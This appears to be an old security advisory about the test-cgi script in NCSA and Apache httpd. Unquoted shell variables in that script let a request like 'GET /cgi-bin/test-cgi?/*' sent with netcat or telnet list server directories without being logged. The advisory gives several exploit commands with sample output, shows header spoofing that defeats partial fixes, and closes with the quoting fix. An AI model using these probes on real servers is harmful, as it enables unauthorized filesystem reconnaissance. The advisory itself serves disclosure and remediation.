COMMAND

    httpd (test-cgi)

SYSTEMS AFFECTED

    httpd with test-cgi script

PROBLEM

    On many web sites there exists a file called test-cgi (usually  in
    the cgi-bin directory  or somewhere similar).  There is a  problem
    with many of these test-cgi files. If your test-cgi file  contains
    the following line (verbatim) then you are probably vulnerable.

    echo QUERY_STRING = $QUERY_STRING

    All of  these lines  should have  the variables  enclosed in loose
    quotes  (").  Without  these  quotes  certain  special  characters
    (specifically  '*')  get  expanded  where  they  shouldn't.   Thus
    submitting  a  query  of  '*'  will  return  the  contents  of the
    current  directory  (probably  where  all  of the cgi files are...
    gee,  there's  jj  and  phf.  Hmmm  what are all those other cgi's
    that  I  haven't  seen...  wonder  what  holes  exist  in those?).
    Sending  in  a  query  of  '/*'  will  list  the  root  directory.
    And so on, and so on.

    This is the  same as doing  `echo *` when  you've blown away  'ls'
    (not that this ever happens to anyone <grin>).

    The  easiest  way  to  list  out  the directories is via the query
    string.  However,  it  is  possible  to  do the same thing through
    many of the other variables (ie $REMOTE_HOST, $REMOTE_USER,  etc.)
    in the right situations.

    Example exploit:

    Below are  examples (nc  is netcat  from avian.org,  if you  don't
    have it you  should get it  as it is  an invaluable tool.  You can
    always just telnet to port 80 and type in the GET... command.)

-----------------------------------------------------------------------------
machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
-----------------------------------------------------------------------------

    Or to see what other cgi-goodies are still floating around...

-----------------------------------------------------------------------------
machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is \*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
-----------------------------------------------------------------------------

    Some versions of NCSA  and Apache have corrected  the QUERY_STRING
    line, but not the CONTENT_TYPE nor the CONTENT_LENGTH line,  while
    these datas can be easily spoofed ( see example below ). In  fact,
    the CONTENT_TYPE  line is  potentially more  'dangerous' than  the
    QUERY_STRING line  because usually,  http deamons  don't log  this
    field.

    Example exploit:

        machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

    or,

        machine% telnet www.host.com 80
        GET /cgi-bin/test-cgi HTTP/1.0
        Content-type: /*

        <Cgi output displayed here>

    or,

        machine% telnet www.host.com 80
        GET /cgi-bin/test-cgi /*
        Content-type: text/html

        This exploits SERVER_PORT.

    Another big problem  is that these  actions will not  be logged by
    the http  deamon. That  means that  if your  test-cgi file  is not
    protected  adequately,  your  filesystem  may  have  already  been
    browsed, and you have no clue.

SOLUTION

    The quick fix is to place loose quotes around all of the variables
    in  the  test-cgi  file  (they  should  have  been  there from the
    beginning!).

    echo QUERY_STRING = "$QUERY_STRING"

    This incorrect  file has  been seen  in at  least several versions
    of NCSA, and Apache.